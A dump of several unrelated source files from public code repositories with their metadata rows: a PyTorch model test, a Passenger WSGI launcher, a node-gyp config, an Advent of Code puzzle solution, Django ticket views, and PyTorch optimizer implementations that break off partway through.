with pytest.raises(AssertionError):
kdpm._check_data(data)
@patch('shfl.model.deep_learning_model_pt.DeepLearningModelPyTorch.get_model_params')
def test_wrong_labels(mock_get_params):
num_data = 5
criterion = Mock()
optimizer = Mock()
model = Mock()
criterion.return_value = np.float64(0.0)
mock_get_params.return_value = [np.random.rand(num_data, 1, 24, 24), np.random.rand(10)]
batch = 32
epoch = 1
metrics = None
device = 'cpu'
kdpm = DeepLearningModelPyTorch(model, criterion, optimizer, batch, epoch, metrics, device)
num_data = 5
labels = np.array([np.zeros(9) for i in range(num_data)])
for l in labels:
l[np.random.randint(0, len(l))] = 1
with pytest.raises(AssertionError):
kdpm._check_labels(labels)
| [
"gegonzalezse@gmail.com"
] | gegonzalezse@gmail.com |
aada7d908cda3af1717d57d4fd470e027d121983 | e57a58a9169d579e2436f1229d876413d7497bc2 | /passenger_wsgi.py | ac281d03cfc5cd47490047e6d9e0b57f87aff464 | [] | no_license | leety/alpha | dc56c12677a183e2a76f83493f12fc97bb95916f | c3efe1d67081522e018e9181a07ea3823a82fc67 | refs/heads/master | 2021-01-13T11:52:01.249529 | 2017-02-14T10:34:06 | 2017-02-14T10:34:06 | 81,694,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | import sys, os
cwd = os.getcwd()
sys.path.append(cwd)
#sys.path.append(cwd + '/_cms')
# Specify Interpreter
INTERP = os.path.expanduser("~/_venv/ssrd_v35/bin/python3")
if sys.executable != INTERP: os.execl(INTERP, INTERP, *sys.argv)
sys.path.insert(0,'$HOME/_venv/ssrd_v35/bin')
sys.path.insert(0,'$HOME/_venv/ssrd_v35/lib/python3.5/site-packages/django')
sys.path.insert(0,'$HOME/_venv/ssrd_v35/lib/python3.5/site-packages')
os.environ['DJANGO_SETTINGS_MODULE'] = '_cms.settings'
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| [
"hello.tien@gmail.com"
] | hello.tien@gmail.com |
b37a7112a1c54f36f2c252afd4b26a436e42e6f5 | ac04d359b6d901a84d3cd9d77f3ddb2f06b3269b | /node_modules/socket.io/node_modules/socket.io-client/node_modules/engine.io-client/node_modules/ws/build/config.gypi | b00092afb1d480fa3a7bed1959b4a9c7cbf39ca2 | [
"MIT"
] | permissive | martinsrs/node-socket-cron | aaa774241087fb20168eb67f77cbe66311cbb930 | c9d462b01d35ac86ddcd038c28d534a7f318afb2 | refs/heads/master | 2020-04-04T14:48:47.487034 | 2015-04-16T12:49:04 | 2015-04-16T12:49:04 | 31,238,588 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,066 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"node_install_npm": "true",
"node_prefix": "/usr/local/Cellar/node/0.10.26",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_unsafe_optimizations": 0,
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"python": "/usr/bin/python",
"target_arch": "x64",
"v8_enable_gdbjit": 0,
"v8_no_strict_aliasing": 1,
"v8_use_snapshot": "true",
"nodedir": "/Users/eduardomartins/.node-gyp/0.10.26",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"shell": "/bin/zsh",
"parseable": "",
"shrinkwrap": "true",
"email": "",
"init_license": "ISC",
"cache_max": "null",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"registry": "https://registry.npmjs.org/",
"fetch_retries": "2",
"npat": "",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"cache_lock_retries": "10",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/eduardomartins/.npm-init.js",
"userconfig": "/Users/eduardomartins/.npmrc",
"node_version": "v0.10.26",
"user": "",
"save": "true",
"editor": "vi",
"tag": "latest",
"global": "",
"optional": "true",
"username": "",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "null",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"strict_ssl": "true",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/eduardomartins/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"ignore_scripts": "",
"user_agent": "node/v0.10.26 darwin x64",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"umask": "18",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/rc/6k3t_6tj3175tg8q28p8prhr0000gn/T/",
"unsafe_perm": "true",
"prefix": "/usr/local",
"link": ""
}
}
| [
"martins.rs@gmail.com"
] | martins.rs@gmail.com |
b517da0b0b1bd999245dbe80669a71eb33fdb5b5 | 2c5789827efad96457cb9ae43724db30f2652fb5 | /19/2.py | 0b150f76a7de9d0cb5d802916f060c20b03e80b1 | [] | no_license | harvito/aoc2020 | f6167d7e1cb7a829837a3071d45cdea56b2e1eb5 | 5786886ba431450c36b02fc74bf94f6ad7c81737 | refs/heads/master | 2023-02-09T09:29:02.106065 | 2021-01-02T21:07:43 | 2021-01-02T21:07:43 | 326,283,346 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,346 | py | with open("input.txt") as f:
blocks = f.read().split("\n\n")
rulesLines = blocks[0].splitlines()
inputLines = blocks[1].splitlines()
numRules = len(rulesLines)
rulesList = [[]] * numRules
referencedBy = [set()] * numRules
memo = [[]] * numRules
activeQueue = []
for line in rulesLines:
parts = line.split(": ")
index = int(parts[0])
ors = parts[1].split(" | ")
seqs = []
for seq in ors:
seqList = seq.split()
if seqList[0][0] == '"':
literal = [seqList[0][1]]
memo[index] = literal
# print "appending", literal
seqs.append(literal)
memo[index] = literal
activeQueue.append(index)
else:
# print "appending", seqList
seqIntList = [ int(x) for x in seqList ]
seqs.append(seqList)
for i in seqIntList:
referencedBy[i].add(index)
rulesList[index] = seqs
# 8: 42 | 42 8
# 11: 42 31 | 42 11 31
rulesList[8] = [["42"], ["42", "8"]]
rulesList[11] = [["42", "31"], ["42", "11", "31"]]
longestTest = max(len(ele) for ele in inputLines)
print rulesList
print "base rules:", memo
print "longest test length:", longestTest
rule8count = 0
rule11count = 0
completedSet = set(activeQueue)
i = 0
while len(completedSet) < numRules:
ruleNo = activeQueue[i]
rule = rulesList[ruleNo]
# skip if we don't have enough info memoized
for seq in rule:
for r in seq:
if not memo[r]:
continue
if ruleNo == 8:
if rule8count > 10:
completedSet.add(ruleNo)
else:
rule8count += 1
elif ruleNo == 11:
if rule11count > 10:
completedSet.add(ruleNo)
else:
rule11count += 1
else:
completedSet.add(ruleNo)
# find who references this rule
for r in referencedBy[ruleNo]:
if (r not in completedSet) or (r in [8, 11]):
activeQueue.append(r)
matchesList = [] # should be a list of strings
for seq in rule:
matching = [""] # another list of matching strings, starting with the empty string
for rule in seq: # ex 12 71 9
if not memo[ruleNo]:
print "UH OH RULE NOT MEMOIZED:", rule
newMatching = []
for match in memo[ruleNo]:
for oldMatch in matching:
newMatching.append(oldMatch + match)
matchesList += matching # join the rules into 1 string
memo[ruleNo] = matchesList
i += 1
print "OK" | [
"michael.harvey@mail.mcgill.ca"
] | michael.harvey@mail.mcgill.ca |
fc36d84f94ba46943d0a7f3c5006f6ab24c005d4 | 35013eaf58d72593abcde2db0b36d44ccc1ddec4 | /ticketter/ticket/views.py | ce70f5d01c7924d73a073da782bec321c69a4e60 | [] | no_license | Nishant173/support-ticket-assignment | e81b154aaa575e86acc054682b84e7737ab9da56 | 31e389103bdcd1c05edd8db8911e05285f10e3f1 | refs/heads/main | 2023-01-28T21:05:11.788696 | 2020-12-09T11:26:42 | 2020-12-09T11:26:42 | 319,643,684 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,852 | py | from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect, render
from .forms import TicketCreationForm
from .models import Ticket
from . import utils
from api import (crud_ops as api_crud_ops,
errors as api_errors,
filters as api_filters)
# @login_required
# def create_ticket(request):
# if request.method == 'POST':
# form = TicketCreationForm(data=request.POST)
# if form.is_valid():
# form.save()
# messages.success(request=request, message="Ticket has been created")
# return redirect(to='account-home')
# else:
# form = TicketCreationForm(initial={'username': request.user.username})
# return render(request=request, template_name='ticket/create_ticket.html', context={'form': form})
# @login_required
# def view_tickets(request):
# tickets = Ticket.objects.filter(username__exact=request.user.username)
# is_empty = (len(tickets) == 0)
# context = {
# 'tickets': tickets,
# 'is_empty': is_empty,
# }
# return render(request=request, template_name='ticket/view_tickets.html', context=context)
@login_required
def create_ticket(request):
if request.method == 'POST':
form = TicketCreationForm(data=request.POST)
if form.is_valid():
dict_obj = form.cleaned_data
dict_obj = utils.map_model2api(dict_obj=dict_obj, email=request.user.email)
response = api_crud_ops.post_ticket(dict_obj=dict_obj)
if response.get('status_code', '') in [200, 201]:
messages.success(request=request, message="Ticket has been created")
return redirect(to='account-home')
else:
status_code = response.get('status_code', 'Backend')
messages.warning(request=request,
message=f"{status_code} error. Please try again later")
else:
form = TicketCreationForm(initial={'username': request.user.username})
return render(request=request, template_name='ticket/create_ticket.html', context={'form': form})
@login_required
def view_tickets(request):
username = request.user.username
try:
tickets = api_crud_ops.get_tickets()
except api_errors.BadApiRequestError:
context = {'tickets': [], 'is_empty': True, 'is_error': True, 'username': username}
else:
tickets = api_filters.filter_tickets(tickets=tickets, email=request.user.email)
is_empty = (len(tickets) == 0)
context = {
'tickets': tickets,
'is_empty': is_empty,
'is_error': False,
'username': username,
}
return render(request=request, template_name='ticket/view_tickets.html', context=context) | [
"nishant.rao173@gmail.com"
] | nishant.rao173@gmail.com |
fac8ec60cc6c93ba0484b469e3c1814f07f23104 | 3b28143a893fcd6d2d0ed843db74eaf5f63fe542 | /pydatagrand/callback/optimizater.py | 603284a6359f1eea4369c77f94000b37cf2c16a2 | [] | no_license | gaozhanfire/daguan_2019_rank9 | 1e2f506c11067cf66ff0fe3a2460773f71955ef6 | 2b77a50455d33a8d484180fa548025b5ef72dfb6 | refs/heads/master | 2020-08-06T17:42:54.445208 | 2019-09-30T12:01:41 | 2019-09-30T12:01:41 | 213,096,559 | 1 | 0 | null | 2019-10-06T02:03:12 | 2019-10-06T02:03:11 | null | UTF-8 | Python | false | false | 66,068 | py | import math
import torch
import operator
from copy import copy
import functools
from math import sqrt
from torch.optim.optimizer import Optimizer
import itertools as it
from torch.nn.utils import clip_grad_norm_
from .utils import *
__call__ = ['SGDW',
'AdamW',
'AdaBound',
'Nadam',
'AdaFactor',
'WeightDecayOptimizerWrapper',
'NovoGrad',
'Lamb',
'Lars',
'RAdam',
'Ralamb',
'Lookahead',
'RaLars',
'Ranger',
'BertAdam'
]
class SGDW(Optimizer):
r"""Implements stochastic gradient descent (optionally with momentum) with
weight decay from the paper `Fixing Weight Decay Regularization in Adam`_.
Nesterov momentum is based on the formula from
`On the importance of initialization and momentum in deep learning`__.
Args:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float): learning rate
momentum (float, optional): momentum factor (default: 0)
weight_decay (float, optional): weight decay factor (default: 0)
dampening (float, optional): dampening for momentum (default: 0)
nesterov (bool, optional): enables Nesterov momentum (default: False)
.. _Fixing Weight Decay Regularization in Adam:
https://arxiv.org/abs/1711.05101
Example:
>>> model = LSTM()
>>> optimizer = SGDW(model.parameters(), lr=0.1, momentum=0.9,weight_decay=1e-5)
"""
def __init__(self, params, lr=0.1, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if lr < 0.0:
raise ValueError(f"Invalid learning rate: {lr}")
if momentum < 0.0:
raise ValueError(f"Invalid momentum value: {momentum}")
if weight_decay < 0.0:
raise ValueError(f"Invalid weight_decay value: {weight_decay}")
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGDW, self).__init__(params, defaults)
def __setstate__(self, state):
super(SGDW, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
if weight_decay != 0:
p.data.add_(-weight_decay, p.data)
p.data.add_(-group['lr'], d_p)
return loss
class AdamW(Optimizer):
"""Implements Adam algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsgrad (boolean, optional): whether to use the AMSGrad variant of this
algorithm from the paper `On the Convergence of Adam and Beyond`_
Example:
>>> model = LSTM()
>>> optimizer = AdamW(model.parameters(), lr=1e-3, weight_decay=1e-5)
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, amsgrad=False):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,weight_decay=weight_decay, amsgrad=amsgrad)
#super(AdamW, self).__init__(params, defaults)
super().__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
if group['weight_decay'] != 0:
decayed_weights = torch.mul(p.data, group['weight_decay'])
p.data.addcdiv_(-step_size, exp_avg, denom)
p.data.sub_(decayed_weights)
else:
p.data.addcdiv_(-step_size, exp_avg, denom)
return loss
class AdaBound(Optimizer):
"""Implements AdaBound algorithm.
It has been proposed in `Adaptive Gradient Methods with Dynamic Bound of Learning Rate`_.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): Adam learning rate (default: 1e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.9, 0.999))
final_lr (float, optional): final (SGD) learning rate (default: 0.1)
gamma (float, optional): convergence speed of the bound functions (default: 1e-3)
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
amsbound (boolean, optional): whether to use the AMSBound variant of this algorithm
.. Adaptive Gradient Methods with Dynamic Bound of Learning Rate:
https://openreview.net/forum?id=Bkg3g2R9FX
Example:
>>> model = LSTM()
>>> optimizer = AdaBound(model.parameters())
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), final_lr=0.1, gamma=1e-3,
eps=1e-8, weight_decay=0, amsbound=False):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= final_lr:
raise ValueError("Invalid final learning rate: {}".format(final_lr))
if not 0.0 <= gamma < 1.0:
raise ValueError("Invalid gamma parameter: {}".format(gamma))
defaults = dict(lr=lr, betas=betas, final_lr=final_lr, gamma=gamma, eps=eps,
weight_decay=weight_decay, amsbound=amsbound)
super(AdaBound, self).__init__(params, defaults)
self.base_lrs = list(map(lambda group: group['lr'], self.param_groups))
def __setstate__(self, state):
super(AdaBound, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsbound', False)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group, base_lr in zip(self.param_groups, self.base_lrs):
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsbound = group['amsbound']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(p.data)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(p.data)
if amsbound:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(p.data)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsbound:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1 - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
if amsbound:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = max_exp_avg_sq.sqrt().add_(group['eps'])
else:
denom = exp_avg_sq.sqrt().add_(group['eps'])
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
# Applies bounds on actual learning rate
# lr_scheduler cannot affect final_lr, this is a workaround to apply lr decay
final_lr = group['final_lr'] * group['lr'] / base_lr
lower_bound = final_lr * (1 - 1 / (group['gamma'] * state['step'] + 1))
upper_bound = final_lr * (1 + 1 / (group['gamma'] * state['step']))
step_size = torch.full_like(denom, step_size)
step_size.div_(denom).clamp_(lower_bound, upper_bound).mul_(exp_avg)
p.data.add_(-step_size)
return loss
class Nadam(Optimizer):
"""Implements Nadam algorithm (a variant of Adam based on Nesterov momentum).
It has been proposed in `Incorporating Nesterov Momentum into Adam`__.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 2e-3)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
schedule_decay (float, optional): momentum schedule decay (default: 4e-3)
__ http://cs229.stanford.edu/proj2015/054_report.pdf
__ http://www.cs.toronto.edu/~fritz/absps/momentum.pdf
Originally taken from: https://github.com/pytorch/pytorch/pull/1408
NOTE: Has potential issues but does work well on some problems.
Example:
>>> model = LSTM()
>>> optimizer = Nadam(model.parameters())
"""
def __init__(self, params, lr=2e-3, betas=(0.9, 0.999), eps=1e-8,
weight_decay=0, schedule_decay=4e-3):
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, schedule_decay=schedule_decay)
super(Nadam, self).__init__(params, defaults)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['m_schedule'] = 1.
state['exp_avg'] = grad.new().resize_as_(grad).zero_()
state['exp_avg_sq'] = grad.new().resize_as_(grad).zero_()
# Warming momentum schedule
m_schedule = state['m_schedule']
schedule_decay = group['schedule_decay']
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
eps = group['eps']
state['step'] += 1
t = state['step']
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
momentum_cache_t = beta1 * \
(1. - 0.5 * (0.96 ** (t * schedule_decay)))
momentum_cache_t_1 = beta1 * \
(1. - 0.5 * (0.96 ** ((t + 1) * schedule_decay)))
m_schedule_new = m_schedule * momentum_cache_t
m_schedule_next = m_schedule * momentum_cache_t * momentum_cache_t_1
state['m_schedule'] = m_schedule_new
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(1. - beta1, grad)
exp_avg_sq.mul_(beta2).addcmul_(1. - beta2, grad, grad)
exp_avg_sq_prime = exp_avg_sq / (1. - beta2 ** t)
denom = exp_avg_sq_prime.sqrt_().add_(eps)
p.data.addcdiv_(-group['lr'] * (1. - momentum_cache_t) / (1. - m_schedule_new), grad, denom)
p.data.addcdiv_(-group['lr'] * momentum_cache_t_1 / (1. - m_schedule_next), exp_avg, denom)
return loss
class AdaFactor(Optimizer):
'''
# Code below is an implementation of https://arxiv.org/pdf/1804.04235.pdf
# inspired but modified from https://github.com/DeadAt0m/adafactor-pytorch
Example:
>>> model = LSTM()
>>> optimizer = AdaFactor(model.parameters(),lr= lr)
'''
def __init__(self, params, lr=None, beta1=0.9, beta2=0.999, eps1=1e-30,
eps2=1e-3, cliping_threshold=1, non_constant_decay=True,
enable_factorization=True, ams_grad=True, weight_decay=0):
enable_momentum = beta1 != 0
if non_constant_decay:
ams_grad = False
defaults = dict(lr=lr, beta1=beta1, beta2=beta2, eps1=eps1,
eps2=eps2, cliping_threshold=cliping_threshold,
weight_decay=weight_decay, ams_grad=ams_grad,
enable_factorization=enable_factorization,
enable_momentum=enable_momentum,
non_constant_decay=non_constant_decay)
super(AdaFactor, self).__init__(params, defaults)
def __setstate__(self, state):
super(AdaFactor, self).__setstate__(state)
def _experimental_reshape(self, shape):
temp_shape = shape[2:]
if len(temp_shape) == 1:
new_shape = (shape[0], shape[1]*shape[2])
else:
tmp_div = len(temp_shape) // 2 + len(temp_shape) % 2
new_shape = (shape[0]*functools.reduce(operator.mul,
temp_shape[tmp_div:], 1),
shape[1]*functools.reduce(operator.mul,
temp_shape[:tmp_div], 1))
return new_shape, copy(shape)
def _check_shape(self, shape):
'''
output1 - True - algorithm for matrix, False - vector;
output2 - need reshape
'''
if len(shape) > 2:
return True, True
elif len(shape) == 2:
return True, False
elif len(shape) == 2 and (shape[0] == 1 or shape[1] == 1):
return False, False
else:
return False, False
def _rms(self, x):
return sqrt(torch.mean(x.pow(2)))
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
if grad.is_sparse:
raise RuntimeError('Adam does not support sparse \
gradients, use SparseAdam instead')
is_matrix, is_need_reshape = self._check_shape(grad.size())
new_shape = p.data.size()
if is_need_reshape and group['enable_factorization']:
new_shape, old_shape = \
self._experimental_reshape(p.data.size())
grad = grad.view(new_shape)
state = self.state[p]
if len(state) == 0:
state['step'] = 0
if group['enable_momentum']:
state['exp_avg'] = torch.zeros(new_shape,
dtype=torch.float32,
device=p.grad.device)
if is_matrix and group['enable_factorization']:
state['exp_avg_sq_R'] = \
torch.zeros((1, new_shape[1]),
dtype=torch.float32,
device=p.grad.device)
state['exp_avg_sq_C'] = \
torch.zeros((new_shape[0], 1),
dtype=torch.float32,
device=p.grad.device)
else:
state['exp_avg_sq'] = torch.zeros(new_shape,
dtype=torch.float32,
device=p.grad.device)
if group['ams_grad']:
state['exp_avg_sq_hat'] = \
torch.zeros(new_shape, dtype=torch.float32,
device=p.grad.device)
if group['enable_momentum']:
exp_avg = state['exp_avg']
if is_matrix and group['enable_factorization']:
exp_avg_sq_r = state['exp_avg_sq_R']
exp_avg_sq_c = state['exp_avg_sq_C']
else:
exp_avg_sq = state['exp_avg_sq']
if group['ams_grad']:
exp_avg_sq_hat = state['exp_avg_sq_hat']
state['step'] += 1
lr_t = group['lr']
lr_t *= max(group['eps2'], self._rms(p.data))
if group['enable_momentum']:
if group['non_constant_decay']:
beta1_t = group['beta1'] * \
(1 - group['beta1'] ** (state['step'] - 1)) \
/ (1 - group['beta1'] ** state['step'])
else:
beta1_t = group['beta1']
exp_avg.mul_(beta1_t).add_(1 - beta1_t, grad)
if group['non_constant_decay']:
beta2_t = group['beta2'] * \
(1 - group['beta2'] ** (state['step'] - 1)) / \
(1 - group['beta2'] ** state['step'])
else:
beta2_t = group['beta2']
if is_matrix and group['enable_factorization']:
exp_avg_sq_r.mul_(beta2_t). \
add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
add_(group['eps1']),
dim=0, keepdim=True))
exp_avg_sq_c.mul_(beta2_t). \
add_(1 - beta2_t, torch.sum(torch.mul(grad, grad).
add_(group['eps1']),
dim=1, keepdim=True))
v = torch.mul(exp_avg_sq_c,
exp_avg_sq_r).div_(torch.sum(exp_avg_sq_r))
else:
exp_avg_sq.mul_(beta2_t). \
addcmul_(1 - beta2_t, grad, grad). \
add_((1 - beta2_t)*group['eps1'])
v = exp_avg_sq
g = grad
if group['enable_momentum']:
g = torch.div(exp_avg, 1 - beta1_t ** state['step'])
if group['ams_grad']:
torch.max(exp_avg_sq_hat, v, out=exp_avg_sq_hat)
v = exp_avg_sq_hat
u = torch.div(g, (torch.div(v, 1 - beta2_t **
state['step'])).sqrt().add_(group['eps1']))
else:
u = torch.div(g, v.sqrt())
u.div_(max(1, self._rms(u) / group['cliping_threshold']))
p.data.add_(-lr_t * (u.view(old_shape) if is_need_reshape and
group['enable_factorization'] else u))
if group['weight_decay'] != 0:
p.data.add_(-group['weight_decay'] * lr_t, p.data)
return loss
class WeightDecayOptimizerWrapper(Optimizer):
'''
Example:
>>> from torch.optim import Adam
>>> model = LSTM()
>>> optimizer = WeightDecayOptimizerWrapper(Adam(model.parameters(),lr = 1e-3),weight_decay=0.05)
'''
def __init__(self, optimizer, weight_decay, change_with_lr = True):
self.optimizer = optimizer
if isinstance(weight_decay, (list, tuple)):
assert len(weight_decay) == len(self.optimizer.param_groups)
assert all((x >= 0 for x in weight_decay))
self.weight_decays = weight_decay
else:
assert weight_decay >= 0
self.weight_decays = [weight_decay] * \
len(self.optimizer.param_groups)
self.state = self.optimizer.state
self.change_with_lr = change_with_lr
def step(self, closure=None) -> None:
for group, weight_decay in zip(self.optimizer.param_groups, self.weight_decays):
for param in group['params']:
if param.grad is None or weight_decay == 0:
continue
if self.change_with_lr:
param.data = param.data.add(
-weight_decay * group['lr'], param.data)
else:
param.data.add_(-weight_decay, param.data)
self.optimizer.step()
def zero_grad(self) -> None:
self.optimizer.zero_grad()
def add_param_group(self, param_group):
self.optimizer.add_param_group(param_group)
def load_state_dict(self, state_dict):
self.optimizer.load_state_dict(state_dict)
def state_dict(self):
return self.optimizer.state_dict()
def __repr__(self):
return self.optimizer.__repr__()
def __getstate__(self):
return self.optimizer.__getstate__()
def __setstate__(self, state):
self.optimizer.__setstate__(state)
self.state = self.optimizer.state
@property
def param_groups(self):
return self.optimizer.param_groups
class NovoGrad(Optimizer):
"""Implements NovoGrad algorithm.
Arguments:
params (iterable): iterable of parameters to optimize or dicts defining
parameter groups
lr (float, optional): learning rate (default: 1e-2)
betas (Tuple[float, float], optional): coefficients used for computing
running averages of gradient and its square (default: (0.95, 0.98))
eps (float, optional): term added to the denominator to improve
numerical stability (default: 1e-8)
weight_decay (float, optional): weight decay (L2 penalty) (default: 0)
Example:
>>> model = ResNet()
>>> optimizer = NovoGrad(model.parameters(), lr=1e-2, weight_decay=1e-5)
"""
def __init__(self, params, lr=0.01, betas=(0.95, 0.98), eps=1e-8,
